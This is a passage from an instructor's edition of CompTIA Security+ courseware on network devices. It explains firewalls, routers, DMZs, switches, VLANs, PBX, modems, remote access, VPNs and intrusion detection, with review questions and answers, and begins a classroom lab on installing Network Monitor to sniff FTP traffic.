Do it!              A-2:      Designing the firewall to implement policy
                      Questions and answers
                       1 Network address translation (NAT) involves the translating of the MAC address
                         of a network interface card before a packet is sent out onto the Internet. True or
                         false?

                          False. NAT masks the IP addresses of computers behind the firewall from the external world.

                       2 The problem with basic NAT is that each active connection requires a unique
                         external address for the duration of the communication. True or false?

                          True

                       3 Stateless packet filters can record session-specific information about the network
                         connection. True or false?

                          False: Stateful packet filters do this.

                       4 Which of the following data items is found in the port address translation table?
                         (Choose all that apply.)
                          A      Source address
                          B      NAT source port
                          C      NAT source IP address
                          D      Destination port
                          E      All of the above

                       5 Most packet filters can be configured to screen information based on the protocol
                         type, IP address, TCP/UPD port, and source routing information fields. True or
                         false?

                          True

                       6 Access control lists work by blocking all inbound packets. True or false?

                          False: They can either allow or block inbound or outbound packets for specific IP addresses.
                                                                                       Network devices   9–9


Topic B: Routers
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.1   Understand security concerns and concepts of the following types of devices
                      • Routers




              Introducing routers
Explanation   A router is a network management device that sits between different network segments
              and routes traffic from one network to another. This role of digital go-between is
              essential because it allows different networks to communicate with one another and
              allows the Internet to function. With the addition of packet filtering however, routers
              can take on an additional role of digital traffic cop.

              How a router moves information
              When you use your computer to access the Internet, you are employing the services of
              multiple routers. You type an address into your Web browser, the request is sent out into
              cyberspace, and the requested Web page loads on your browser. The steps involved are
              as follows:
                  1 Internet data, whether in the form of a Web page, a downloaded file, or an e-
                      mail message, travels over a packet-switching network. The information is
                      broken up into pieces and inserted as data into packets.
                  2 To complete the packet, additional information is included: the sender’s address,
                      the receiver’s address, and a checksum value that allows the receiving computer
                      to be sure that the packet arrived intact.
                  3 Each packet is then sent to its destination using the best available route, which
                      might differ for each packet.
              If the path the packet takes is not preset, then how is it chosen? That is where the router
              comes in. The routers that make up the main part of the Internet can reconfigure the
              paths that packets take because they are constantly in communication with one another
              and are aware of each of the networks to which they are connected. By examining the
              contents of the packet and comparing the destination address to the list of addresses
              contained in the router’s lookup tables, they can determine which router to send the
              packet along to next, based on changing network conditions.

              Beyond the firewall
              Beyond the firewall, but before the Internet, lies a no-man’s land called the
              demilitarized zone (DMZ) and, potentially, one or more bastion hosts.
9–10   CompTIA Security+ Certification

                  Demilitarized zone (DMZ)
                  The demilitarized zone (DMZ) is the area that a company sets aside for servers that are
                  publicly accessible or have lower security requirements than other internal servers. The
                  DMZ gets its name from the traditional setup of a network segment between two
                  routers. This environment neither is subject to the unsecure environment of the Internet,
                  nor is it fully protected by the internal router—hence it is “demilitarized.”
                  The DMZ is commonly home to public Web, FTP, and DNS servers that need to be
                  accessed by the public. This is also a typical location to place remote dial-up access,
                  providing defense in depth with the interior router. If a hacker gains access to the
                  RADIUS server, he or she still must authenticate through the internal firewall. This can
                  be seen in Exhibit 9-1.




                  Exhibit 9-1: An example of a demilitarized zone (DMZ)


                  Bastion hosts
                  A bastion host is defined as a computer that resides in a DMZ and hosts Web, mail,
                  DNS, and/or FTP services. An effective bastion host is configured quite differently from
                  a typical host. Some organizations have a bastion host that offers several services at
                  once; other organizations prefer to have several bastion hosts with each fulfilling a
                  specific role. In either event, all unnecessary programs, services, and protocols are
                  removed and all unnecessary network ports are disabled.
                  In addition, bastion hosts do not share authentication services with trusted hosts within
                  the network. This is so that, if a bastion host is compromised, the hacker cannot gain
                  any information beyond what resides on the bastion host. ACLs are modified on the file
                  system and other system objects.
                  All appropriate service packs, hot fixes, and patches should be installed on bastion
                  hosts. Logging of all security-related events should also be enabled, and those logs
                  should be reviewed on a regular basis to increase the chance of observing any
                  inappropriate behavior.
                                                                 Network devices     9–11

“Honey pots” or decoy computers specifically set up to attract and track potential
hackers are not considered true bastion hosts, because they are not designed to offer
legitimate services to the Internet, but rather are deliberately exposed to delay and
sidetrack potential hackers and to facilitate tracking of any attempted break-ins.

Application gateways
Application gateways, also known as proxy servers, monitor specific applications such
as FTP, HTTP, and Telnet, plus they allow packets accessing those services to go to
only those computers that are allowed. Application gateways are a good backup to
packet filters because a firewall that is set up to allow a specific service such as FTP can
send the allowed packets to only one computer, the application gateway.
As an example of how an application gateway works, consider a site that blocks all
incoming FTP connections except those to a specific computer. The router allows FTP
packets to go to only one computer, the FTP application gateway. A user who wishes to
connect inbound to an FTP server would have to connect first to the application
gateway, and then to the destination computer, as follows:
    1 A user first connects to the application gateway and enters the name of an
       internal computer.
    2 The gateway checks the user’s source IP address and accepts or rejects it
       according to the access control list.
    3 The user might need to authenticate himself or herself with a username and
       password.
    4 The proxy service creates an FTP connection between the gateway and the
       internal computer.
    5 The gateway proxy service then passes bytes between the two connections.
    6 The application gateway logs the connection.
  The security advantages inherent in application gateways also include:
    • Information hiding — The application gateway might be the only computer with
      a name known to the outside world, the actual servers hosting services such as
      FTP need never be disclosed.
    • Robust authentication and logging — All traffic can be made to pass through
      the application gateway, traffic can be authenticated before it reaches internal
      computers and can be logged.
    • Simpler filtering rules — The application gateway is the only computer that
      needs to be contacted by the filtering firewall or router, those systems need only
      allow application traffic destined for the gateway and discard the rest.
The chief disadvantage of application gateways is that a single computer host assigned
as the gateway must handle all incoming connections that, in a busy environment, could
overwhelm the gateway. In addition, in the case of client-server protocols such as
HTTP, two steps are required to connect inbound or outbound traffic, and this can
increase processor overhead if there are many connections.
9–12   CompTIA Security+ Certification

                  The OSI stack
                  To better describe the various functions in most networks and to further the
                  development of compatible products by vendors, the Open Systems Interconnection
                  (OSI) reference model was developed by the International Organization for
                  Standardization. The seven layer model can be seen in Exhibit 9-2.




                  Exhibit 9-2: The OSI seven layer model

                      • The Physical layer (layer 1) deals with the electrical signals, the media access
                        method (Ethernet, Token-Ring, etc.), and the actual hardware of networking,
                        including cables, connectors, hubs and network cards.
                      • The Data Link layer (layer 2) deals with the MAC address. This is the layer
                        where bridges and older switches function.
                      • The IP protocol works at the Network layer (layer 3), providing addressing and
                        routing functions.
                      • The Transport layer (layer 4) is responsible for host-to-host communications. Its
                        two protocols are TCP and UDP.
                      • The Session layer (layer 5) establishes, manages, and terminates connections.
                      • The Presentation layer (layer 6) translates the application’s data format to the
                        network’s communication format.
                      • The Application layer (layer 7) defines how programs like FTP, HTTP, and
                        Telnet exchange data.
                                                                 Network devices     9–13

A function at each layer need only be able to communicate with the layers above and
below it and be able to communicate with its peer level. Changes at one level should not
affect the ability of the other layers to function. For instance, if a Token Ring network is
migrated to an Ethernet system, only the cabling, hardware, and drivers that represent
the Physical and Data-Link layers need be modified, but the IP network should still
function, as well as all protocols and applications above it.

Limitations of packet-filtering routers
Defining packet filters can be a cumbersome task because network administrators must
have a detailed understanding of the various Internet services, packet header formats,
and the specific values they expect to find in each field. If complex filtering
requirements must be supported, the ACL can become long, complicated, and
increasingly difficult to manage and comprehend. In addition, as the list of filtering
rules grows the processor overhead and, subsequently, the time it takes to handle a
packet also grows.
Generally, as the number of rules being processed by a router increases, the throughput
of the router decreases. Most routers are optimized to extract the destination IP address
from each packet, look up the forwarding information for the packet, and then send the
packet on its way. With packet filtering enabled, the router must now apply each of the
rules in the ACL and make a decision about forwarding the packet. This process
increases the amount of time it takes to send a packet along and decreases the
throughput speed of the router.
Another problem with filtering packets at layers 3 through 5 is that the router is not able
to determine the specific context or data of the packets it is examining. This means that
the router can reject all e-mail packets but cannot reject just those e-mail packets that
contain potentially harmful material such as viruses. In order to block a specific type of
e-mail message, FTP request, or Telnet command, an application gateway or proxy
server needs to be employed.
Routers that employ stateful packet filters act as quasi application gateways, examining
a packet’s content in addition to the IP address.
9–14     CompTIA Security+ Certification

Do it!              B-1: Discussing routers and gateways
                      Questions and answers
                       1 When a packet goes through a router with ________________ packet inspection,
                         the router inspects both the IP header and the content of the packet.

                          stateful

                       2 A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP
                         services is called a ________ ________.

                          bastion host

                       3 IP packets are routed by layer 2 of the OSI model. True or false?

                          False: They are routed by layer 3.

                       4 Application gateways are also known as proxy servers. True or false?

                          True

                       5 Some of the features of a DMZ are:
                          A      It is a network segment between two routers.
                          B      Its servers are publicly accessible.
                          C      Its servers have lower security requirements than other internal servers.
                          D      It commonly contains bastion, public Web, FTP, DNS, and RADIUS servers.
                          E      All of the above.

                       6 Application gateways simplify filtering rules on routers; the router need only
                         allow application traffic destined for the gateway, and can discard the rest. True or
                         false?

                          True

                       7 Which of the following tasks can be performed by the proxy server? (Choose all
                         that apply.)
                          A      Checks its access control list to accept or reject the client request
                          B      Authenticates the user
                          C      Opens a connection between the user and the internal computer
                          E      Logs the connection
                          F      All of the above
                                                               Network devices     9–15

8 Describe two limitations of packet-filtering routers in managing security.
  Answers might include:
  • Packet filters can be cumbersome to define
  • Processor overhead grows and throughput decreases with complexity of the ACL
  • Stateless routers cannot examine the content of a packet
9–16          CompTIA Security+ Certification


Topic C: Switches
                         This topic covers the following CompTIA Security+ exam objective:

                          #      Objective

                          3.1    Understand security concerns and concepts of the following types of devices
                                  • Switches




                         Repeaters, hubs and switches
Explanation              Many network devices, including repeaters, hubs, bridges, and switches, have both
                         physical and logical configurations. Repeaters and hubs function at the Physical layer
                         and extend the Ethernet segment by recreating the transmission signals. Hubs are simply
                         multiport repeaters with all ports existing on the same collision domain.
                         Bridges function at layer 2 and filter and forward packets based on their MAC address.
                         They separate the network into two or more collision domains. Their function is based
                         on a table of MAC addresses and host location built from the moment they are turned
                         on. Switches also function at layer 2, but divide the network into multiple domains, the
                         number depending on the number of ports on the switch. Although bridges and switches
                         divide collision domains, they forward broadcasts to all hosts on the layer 2 network. An
                         example of a switch is shown in Exhibit 9-3.




                         Exhibit 9-3: 3 Com® SuperStack® switch

                         Just as they made moving information within an intranet more efficient, a new breed of
                         switches is now operating at layer 3, the Network layer. It’s now possible to combine
                         the speed of hardware switching with the optimized path choosing of layer 3.

                         Switch security
                         Modern switches offer a variety of security features including ACLs and Virtual Local
                         Area Networks (VLANs). The ACL-based packet filtering is similar to that mentioned
                         previously, so this discussion concentrates on VLANs. From a security perspective, the
                         major benefit of a switch over a hub is the separation of collision domains, limiting the
                         possibility of easy sniffing.
                                                               Network devices    9–17

Virtual local area networks
The following is the Cisco definition of a virtual local area network (VLAN):

   A VLAN is defined as a broadcast domain within a switched network. Broadcast
   domains describe the extent that a network propagates a broadcast frame generated
   by a station. Some switches might be configured to support a single or multiple
   VLANs. Whenever a switch supports multiple VLANs, broadcasts within one VLAN
   never appear in another VLAN. Switch ports configured as a member of one VLAN
   belong to a different broadcast domain, as compared to switch ports configured as
   members of a different VLAN. (Overview of Routing Between Virtual LANs, Cisco
   Systems.)
VLANs increase security by clustering users in smaller groups, thereby making the job
of the hacker harder. Rather than just gaining access to the network, a hacker must now
gain access to a specific virtual LAN as well. In addition, by clustering users in a
VLAN, the possibility of a broadcast storm is reduced.

Security problems with switches
Switches, even with VLANs enabled, are still susceptible to being compromised.
Hackers can hijack a switch and reconfigure it to allow any traffic they wish through the
system.
Switch hijacking occurs when an unauthorized person is able to obtain administrator
privileges of a switch and modify its configuration. Once a switch has been
compromised, the hacker can do a variety of things, such as changing the administrator
password on the switch, turning off ports to critical systems, reconfiguring VLANs to
allow one or more systems to talk to systems they shouldn’t, or they might configure the
switch to bypass the firewall altogether. There are two common ways to obtain
unauthorized access to a switch: trying default passwords, which might not have been
changed, and sniffing the network to get the administrator password via SNMP or
Telnet.
Almost all switches built today come with multiple accounts with default passwords,
and in some cases, no password at all. While most administrators know enough to
change the administrator password for the telnet and serial console accounts, sometimes
people don’t know to change the SNMP strings that provide remote access to the switch.
If the default SNMP strings are not changed or disabled, hackers might be able to obtain
a great deal of information about the network or even gain total control of the switch.
The Internet is full of sites that list the various switch types, their administrator
accounts, SMTP connection strings, and passwords.
If the default password(s) do not work, the switch can still be compromised if a hacker
is sniffing the network while an administrator is logging on to the switch. Contrary to
popular belief, it’s very possible to sniff the network when on some switches. This
means that even if you change the administrator password(s) and the SNMP strings, you
might still be vulnerable to switch hijacking.
The easiest way to sniff a switched network is to use a software tool called “dsniff,”
which tricks the switch into sending packets destined to other systems to the sniffer.
Dsniff not only captures packets on switched networks, but also has the functionality to
automatically decode passwords from insecure protocols such as Telnet, HTTP, and
SNMP, which are commonly used to manage switches.
9–18     CompTIA Security+ Certification

                    Securing a switch
                    Gaining access to a switch is the first step in gaining control of it, all management
                    interfaces on switches should be isolated to reduce the chance of a successful attack.
                    Many switches use Telnet or HTTP—both being open text protocols—for management.
                    It is recommended that any management of the switch be done by physical connection
                    to a serial port or through secure shell (SSH) or another encrypted method if available.
                    Separate switches or hubs should be used for DMZs to physically isolate them from the
                    rest of your network and prevent VLAN jumping.
                    It’s important to put a switch behind a dedicated firewall device. Ensure that you
                    maintain the switch, installing the latest version of the switch software and any security
                    patches to protect yourself against exploits such as the land.c attack. Read the product
                    documentation, paying special attention to administration accounts and default
                    passwords. Always set strong passwords on the switch.

Do it!              C-1:     Understanding switches
                      Questions and answers
                       1 What is the function of a switch?

                          It separates a common segment into two or more collision domains and forwards packets to
                          the correct domain based on the MAC address.

                       2 Modern switches can reduce broadcast traffic by forwarding packets based on the
                         IP address. True or false?

                          True

                       3 A feature available in some switches that permit separating the switch into
                         multiple broadcast domains is called ___________.

                          VLAN

                       4 What is switch hijacking?

                          This is an attack where an unauthorized person obtains administrator privileges of a switch
                          and modifies its configuration to allow any traffic through the network. The hacker can
                          change the switch’s administrator password, turn off ports to critical systems, reconfigure
                          VLANs, or configure the switch to bypass the firewall.
                                                                                       Network devices   9–19


Topic D: Telecom, cable modem, and wireless
         devices
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.1   Understand security concerns and concepts of the following types of devices
                      • Wireless
                      • Modems
                      • Telecom / PBX (Private Branch Exchange)
                      • Mobile Devices




              PBX, DSL, cable modems and mobile devices
Explanation   Communications devices such as PBX, DSL, cable modems, and mobile devices require
              as much diligence when implementing security as the internal network. Your security
              policy should account for these often overlooked devices.

              Private branch exchange
              Private branch exchange (PBX) security is at heart very similar to traditional network
              security and is becoming increasingly more, so with the advent of IP-based telephony.
              An IP-based PBX is pictured in Exhibit 9-4.




              Exhibit 9-4: An IP-based PBX network

              A traditional PBX is a computer-based telephone switch that might be thought of as a
              small, in-house, telephone company. Failure to secure a PBX can result in toll fraud,
              theft of information, denial of service, and enhanced susceptibility to legal liability
              because of disclosure of supposedly secure information.
              As with traditional networks, the process of securing a PBX should be part of a written
              security policy. Determining who will be administering your PBX, who will be allowed
              what services, and what access to the PBX will be allowed, are all essential pieces of
              information.
9–20   CompTIA Security+ Certification


                  Many PBX systems are remotely managed by the vendor who developed the system. If
                  a PBX is remotely managed, that means intrusion into the system can happen without
                  anyone actually gaining physical access to the PBX hardware. It is recommended that,
                  unless you are mandated to provide remote administration by the vendor, you remove
                  this feature and administer the PBX from a console directly connected to the system.
                  Additionally, many PBX systems are setup by default to allow handsets to be attached
                  and detached at will by simply plugging a phone into the network and pressing a code
                  on the keypad. This is done to ease maintenance, especially in those offices where
                  “hoteling” or job sharing is common. Although this does ease the ability to move
                  phones, it also opens a large security hole in the PBX system, because many of the
                  move codes are standardized and posted on the Internet.

                  Modems
                  The increasing availability of digital cable and digital subscriber line (DSL) brought
                  some new security issues with them. Although this section is too limited to cover them
                  in depth, the discussion touches upon several of the more pressing issues. A typical
                  cable modem can be seen in Exhibit 9-5.




                  Exhibit 9-5: EtherFast® cable modem with USB and Ethernet Connection Model
                  BEFCM U10


                  DSL versus cable modem security
                  In the past, DSL had a security edge over cable systems. This came about because of the
                  different methods by which the technologies connected their clients to the Internet.
                  DSL lines provide a direct connection between the computer or network connected on
                  the client side and the Internet. This direct connection is in contrast to the “party line”
                  nature of cable systems. Cable modems are connected to a shared segment that, not
                  unlike a corporate LAN, means that anyone else on that segment can potentially
                  threaten your system unless proper precautions are taken.
                  Although some cable customers encountered problems with the shared nature of the
                  network in the past, most cable service providers now mitigate this problem by building
                  security features into the cable modem hardware used to connect to their networks. In
                  particular, basic network firewall capabilities now prevent customer files from being
                  viewed or downloaded.
                                                               Network devices    9–21

Most cable modems today also implement the Data Over Cable Service Interface
Specification (DOCSIS). DOCSIS includes support for cable network security features
including authentication and packet filtering.

Dynamic versus static IP addressing
Another major security concern that used to plague both DSL and cable modem users
was the issuing of static (permanent) IP addresses by the service providers. Now, most
service providers use Dynamic Host Configuration Protocol (DHCP) to issue dynamic,
random IP addresses to their clients. These are “leased” for a short period. Static
addresses provide a fixed target for potential hackers, so the move to DHCP is definitely
an improvement. Additional security can be provided by a firewall solution.

Wireless
Wireless devices, while providing greater flexibility, mobility, and overall convenience,
and have their own vulnerabilities when it comes to security. While network
connections utilize the same TCP/IP protocol that wired LANs use, the wireless nature
of the technology means that almost anyone can eavesdrop on a network
communication; even if your wireless access point is protected by your firewall, you are
still susceptible to having your unencrypted transmissions overheard. In addition,
without proper access control, anyone can connect to the network. The only secure
method of communicating with wireless technology is limiting access through MAC
address filtering and providing confidentiality with encryption.

Mobile devices
Mobile devices, specifically Personal Digital Assistants (PDAs), can open security holes
for any computer with which these devices communicate. A gap that is not covered by
antivirus software or firewalls occurs during the PDA to PC synchronization process.
View McAfee’s Web site to get more information about wireless security at
http://www.mcafee.com/myapps/vsw/default.asp. An example of a pocket
PC phone can be seen in Exhibit 9-6.




Exhibit 9-6: T-Mobile Pocket PC phone edition
9–22     CompTIA Security+ Certification

Do it!              D-1:      Reviewing telecom, cable, and wireless security
                      Questions and answers
                       1 What are two standard features found in today’s cable modem hardware that
                         protect customer files from being viewed or downloaded?

                          Basic network firewall and Data Over Cable Service Interface Specification (DOCSIS)

                       2 Failure to secure a PBX can result in toll fraud, theft of information, denial of
                         service, and enhanced susceptibility to legal liability because of disclosure of
                         supposedly secure information. True or false?

                          True

                       3 Explain the vulnerability involved in allowing the vendor to remotely manage the
                         PBX system.

                          If a PBX is remotely managed, an intrusion into the system can happen without anyone
                          actually gaining physical access to the PBX hardware.

                       4 Explain why allowing handsets to be attached and detached at will within a PBX
                         system is considered risky.

                          Many of the move codes are standardized and posted on the Internet.

                       5 Why is DHCP considered more secure than static IP addressing?

                          Static IP addresses provide a fixed target for potential hackers; DHCP leases the IP address
                          for a short time.

                       6 DHCP provides enhanced security for a computer by:
                          A      Changing the MAC address of the computer on a random basis
                          B      Changing the IP address of the computer on a random basis
                          C      Tracking all keystrokes entered on the computer

                       7 What is the best method for ensuring confidentiality in wireless communications?
                          A      Firewall
                          B      Encryption
                          C      Authentication
                          D      Access control lists

                       8 How is it possible to spread a virus from a PDA?

                          The virus can be downloaded to a PC during sync operations.
                                                                                       Network devices   9–23


Topic E: Securing remote access
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.1   Understand security concerns and concepts of the following types of devices
                      • RAS (Remote Access Server)
                      • VPN




              Remote access services
Explanation   Permitting employees to remotely access the corporate network requires careful
              consideration and planning. Two commonly used measures for ensuring authentication
              and confidentiality are RAS and VPN.
              The Remote Access Service (RAS) provides the ability for one computer to dial into
              another computer via a standard modem. Once connected and authenticated, the remote
              user has the same access as if connected using a wired network connection.
              RAS servers typically have an array of modems and dial-in lines for remote
              connections. In addition to accepting incoming calls, most RAS servers also offer a
              feature called callback, which allows the server to disconnect an incoming RAS call and
              dial the caller’s number to reconnect. If the caller is not at the designated number, then
              no RAS connection is made. Callback is the most secure method for using RAS, though
              it will only work for fixed phone numbers such as telecommuting workers working
              from home.
              After users connect to the network through RAS, they have the same rights and
              privileges they have when they log on to a workstation that is physically wired to the
              network. RAS treats a modem as an extension of the network; RAS can use the same
              variety of protocols as a standard network interface card (NIC).
              RAS should be placed in the DMZ. It needs some protection, but generally should be
              considered insecure, and remote users should be forced to authenticate through an
              internal firewall prior to gaining full network access. One way to implement this is with
              a “lock and key” access method through the router. This is even available on low-end
              routers (such as Cisco 2600s).

              Security problems with RAS
              The RAS server is typically situated between the Internet and any physical firewall you
              might have in place, you should use a bastion host running only RAS and protected by
              application gateway software or firewall software. To further enhance security, use the
              encryption and mandatory callback features offered on RAS. In addition, if any
              unauthorized persons should gain access to the RAS server, they will still have to break
              through the firewall to get useful information.
9–24   CompTIA Security+ Certification

                  Virtual private networks
                  A Virtual Private Network (VPN) is used to provide a secure communication pathway
                  or tunnel through such public networks as the Internet. An example of a typical VPN
                  can be seen in Exhibit 9-7.




                  Exhibit 9-7: A typical VPN using Point of Presence (POP)

                  When a virtual private network is implemented, the lowest levels of the TCP/IP protocol
                  are implemented using an existing TCP/IP connection. The VPN hardware or software
                  encrypts either the underlying data in a packet or the entire packet itself before
                  wrapping it in another IP packet for delivery. Even if the packet is intercepted along the
                  way, the content cannot be revealed to the hacker. Security is further enhanced by
                  implementing Internet Protocol Security (IPSec).

                  IPSec encryption
                  IPSec was initially developed for Internet Protocol version 6 (IPv6), but many current
                  IPv4 devices support it as well. It is the most commonly used encryption scheme for
                  VPN tunnels.
                  IPSec allows the encryption of either just the data in a packet or the packet as a whole
                  including the address header information. These are called transport and tunnel,
                  respectively.
                  With IPSec in place, a VPN can virtually eliminate packet sniffing and identity
                  spoofing. This is because only the sending and receiving computers hold the keys to
                  encrypt and decrypt the packets being sent across the public network. The following
                  steps show the process:
                      1 A remote user opens a VPN connection between his computer and his office
                          network. The office network and the user’s computer (or their respective VPN
                          gateways) execute a handshake and establish a secure connection by exchanging
                          private keys.
                      2 The user then makes a request for a particular file.
                                                                              Network devices       9–25

            3 Assuming that the user has sufficient rights, the network begins to send the file
              to the user by first breaking the file into packets.
                  • If the VPN is using transport encryption, then the packet’s data is encrypted
                    and the packets are sent on their way.
              • If the system is using tunneling encryption, then each packet is encrypted and
                 placed inside another IP envelope with a new address arranged for by the
                 VPN gateways.
            4 The packets are sent along the Internet until they are received at the user’s VPN
              device, where the encryption is removed and the file is rebuilt. If the VPN is
              using tunneling encryption, the peer VPN gateway forwards the unencrypted
              packets to the appropriate host on its LAN.
         Anyone sniffing the packets would have no idea of their content and might not even be
         able to determine the source and destination of the request.

Do it!   E-1:      Securing remote access devices
          Questions and answers
           1 Describe the callback feature offered by RAS.

              Callback allows the server to disconnect an incoming RAS call and dial the caller’s number
              to reconnect. If the caller is not at the designated number, then no RAS connection is made.

           2 RAS treats a modem as an extension of the network. True or false?

              True

           3 If the RAS is placed in the DMZ, remote users should be forced to authenticate
             through an internal firewall prior to gaining full network access. True or false?

              True

           4 Which encryption method is commonly used for VPN tunneling? (Choose all that
             apply.)
              A      Transport
              B      IPSec
              C      CHAP
              D      EAP
9–26      CompTIA Security+ Certification


Topic F: Intrusion detection systems
                     This topic covers the following CompTIA Security+ exam objective:

                      #      Objective

                      3.1    Understand security concerns and concepts of the following types of devices
                              • IDS (Intrusion Detection System)
                              • Network Monitoring / Diagnostics




                     Host-based IDS
Explanation          Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect,
                     log, and stop misuse or attacks as they occur. IDS solutions are available from a variety
                     of vendors including Computer Associates, Inc., Cisco Systems Inc., NFR Security,
                     SecureWorks, and many others. Systems come in the form of software called computer-
                     based IDS and dedicated hardware devices called network-based IDS.
                     Host-based IDS are often used to secure critical network servers or other systems
                     containing sensitive information. In a typical implementation, software applications
                     known as agents are loaded on each protected computer. These agents make use of the
                     disk space, RAM, and CPU time to analyze the operating system, applications, and
                     system audit trails. The collected information is compared to a set of rules to determine
                     if a security breach has occurred.
                     These agents are tailored to detect computer-related activity and can track these types of
                     events at an extremely fine level, even down to tracking which user accessed which file
                     at what time. Host-based agents can be self-contained, sending alarm information to the
                     screen attached to the computer upon which they are installed or they might be remotely
                     managed by a central software package that receives periodic updates and security data.
                     A computer-based solution that includes a centralized management platform makes it
                     easier to upgrade the software; however, these types of solutions do not scale well
                     across a large enterprise given the number of computers involved.

                     Network-based IDS
                     Network-based IDS monitor activity on a specific network segment. Unlike host-based
                     agents, network-based systems are usually dedicated platforms with two components: a
                     sensor, which passively analyzes network traffic, and a management system, which
                     allows security personnel to configure the sensors and provides alarms or feedback to
                     the administrator. Implementations vary with some vendors selling separate sensor and
                     management platforms and others selling self-contained sensor/management systems.
                     An example of a Cisco IDS can be seen in Exhibit 9-8.
                     The sensors in a network-based IDS capture network traffic in the monitored segment
                     and perform rule-based or expert system analysis of the traffic using configured
                     parameters. The sensors analyze packet headers to determine source and destination
                     addresses in the same manner as a router. In addition, the sensors examine the type of
                     data being transmitted and analyze the content of the packets flowing through them to
                     determine if the packet is legitimate.
                                                                                          Network devices     9–27

                         If the sensor detects a packet that should not be in the system, it can perform a variety of
                         tasks including sending an alarm to the management software or communicating with a
                         router to have the router block all further packets from a particular address.




                         Exhibit 9-8: A Cisco network based IDS


                         Anomaly-based detection
                         Anomaly-based detection involves building statistical profiles of user activity and then
                         reacting to any activity that falls outside these profiles. A user’s profile can contain
Discuss how anomaly      attributes such as time spent logged on to the network, location of network access, files
detection systems are
much like some of
                         and servers accessed, and so forth.
today’s terrorist        One problem with anomaly-based detection is that users do not access their computers
investigators who have
been monitoring a
                         or the network in static, predictable ways; employees are transferred to other
group or an area for     departments, or they go on the road or work from home, changing their point of entry
quite some time and      into the network. Anomaly-based intrusion detection often leads to a large number of
are looking for any      false positives.
changes in standard
activity or behavior,
which might indicate     Signature-based detection
that something is
amiss                    Signature-based detection is very similar to an antivirus program in its method of
                         detecting potential attacks. It’s currently the more popular method of detection. Vendors
                         produce a list of “signatures” that the IDS use to compare against activity on the
                         network or host. When a match is found, the IDS take some action, such as logging the
                         event or sending an alarm to a management console. Although many vendors allow
                         users to configure existing signatures and create new ones, for the most part, customers
                         depend on vendors to provide the latest signatures to keep the IDS up to date with the
                         latest attacks. Signature-based detection can also produce false positives, as certain
                         normal network activity can be construed as malicious. For example, some network
                         applications or operating systems might send out numerous ICMP messages, which a
                         signature-based detection system might interpret as an attempt by an attacker to map out
                         a network segment.
9–28     CompTIA Security+ Certification

Do it!              F-1:      Discussing IDS
                      Questions and answers
                       1 IDS offer the ability to analyze data in real time to detect, log, and stop misuse or
                         attacks as they occur. True or false?

                          True

                       2 Compare the effectiveness of anomaly-based intrusion detection versus signature-
                         based detection.

                          Anomaly-based detection builds statistical profiles of user activities as a baseline for abuse.
                          Users do not access their computers or network in static, predictable ways. The resources
                          required for such a sensor is very large and costly, also, this method leads to a large number
                          of false positives.

                          Signature-based detection relies on a vendor-produced list of signatures to compare against
                          activity on the network or host. This method can also produce a large number of false
                          positives.
                                                                                        Network devices         9–29


Topic G: Network monitoring
              This topic covers the following CompTIA Security+ exam objectives:

               #     Objective

               2.5   Recognize and understand the administration of the following file transfer protocols and
                     concepts
                      • Vulnerabilities
                          • Packet Sniffing

               3.1   Understand security concerns and concepts of the following types of devices
                      • Network Monitoring / Diagnostics




              Network monitoring and diagnostics
Explanation   Network monitoring and diagnostics are essential steps in ensuring the safety and health
              of a network. Network monitoring is exactly what it sounds like, monitoring your
              network to ensure its reliability. Network monitoring and diagnostic tools can be either
              stand-alone or part of a network-monitoring platform such as HP’s OpenView, IBM’s
              Netview/AIX, Fidelia’s NetVigil, or Aprisma’s Spectrum.

              Microsoft Network Monitor
              Network Monitor is provided with Windows Server 2003 and offers basic network
              sniffing features, such as data collection, logging, fault analysis, and performance
              analysis. It’s a good learning tool, but it’s limited to sniffing packets from the local NIC.
              Microsoft also offers an enhanced version of Network Monitor that can operate in
              promiscuous mode and sniff packets from any computer on the network. This product
              should be used on a production network and is packaged along with Microsoft Systems
              Management Server.
              Network monitor captures and displays a packet's source and destination address, the
              protocol used and data sent. If sent data is encrypted, it’s not readable in Network
              Monitor, that is, it's not displayed in plain text. All data sent to a monitored NIC is
              captured by Network Monitor by default. If you want to reduce the scope of what data is
              collected, you can apply a filter. Included with the full version of Network Monitor is
              the ability to identify Network Monitor users.
9–30          CompTIA Security+ Certification

Do it!                         G-1:   Installing Microsoft Network Monitor
                                Here’s how                             Here’s why

      Students should
                                1 Boot to Server-X
have a Windows Server
2003 installation CD-ROM        2 Log on as Administrator              To install Network Monitor.
available for this activity.
                                3 Click Start

                                  Choose Control Panel, Add
                                  or Remove Programs

                                4 Click Add/Remove
                                  Windows Components

       Make sure students
                                5 Select Management and
don't check the check box.        Monitoring Tools

                                  Click Details…

                                6 Check the Network Monitor            To configure Network Monitor to operate on the
                                  Tools box                            appropriate NIC.

                                  Click OK

                                7 Click Next

                                  Insert the Windows Server 2003,      (If prompted.)
                                  Standard Edition CD

                                  Click OK                             To continue the installation.

                                8 Click Finish                         To complete the installation.

                                9 Close the Add or Remove
                                  Programs window

                               10 Open a Command window

                                  Type ipconfig/all                    At the command prompt.

                                  Press e

                               11 Write down the MAC address of
                                  the network card that is connected
                                  to the classroom network
                                                           Network devices       9–31

12 Click Start

   Choose Administrative              You’ll receive a message as shown below.
   Tools, Network Monitor




13 Click OK

14 Expand Local Computer

   Select the appropriate NIC (the    The screen will resemble the one shown below.
   MAC address you wrote in Step 9)




15 Click OK

   Close all windows
9–32          CompTIA Security+ Certification

                         Using Microsoft Network monitor to sniff an FTP session
Explanation              While Network Monitor is a very useful networking utility; it can also be used
                         maliciously. As discussed previously, FTP and Telnet send-usernames and passwords in
                         clear text. Other protocols that send passwords and data in clear text include HTTP,
                         NNTP, IMAP, POP and SNMP. For FTP, Network Monitor can capture the entire FTP
                         session and present the username and password to the potential hacker. One way to
                         prevent this is to use only anonymous access for FTP sites. This does not enable you to
                         lock down access to the server. You could also configure the FTP server to only allow
                         certain IP addresses or use a VPN connection to limit the access to the appropriate
                         users. A sniffer can be also be dangerous because it is very difficult to detect and can be
                         attached to almost any part of a network.




                         Exhibit 9-9: Network Monitor capture of an FTP session
                                                                                               Network devices         9–33

Do it!                          G-2: Using Network Monitor to sniff an FTP session
                                 Here’s how                              Here’s why
                                 1 Access Computer Management            Pair up with a partner for this activity. Each of
       Students should run
this activity with a partner.                                            your servers should have FTP services and
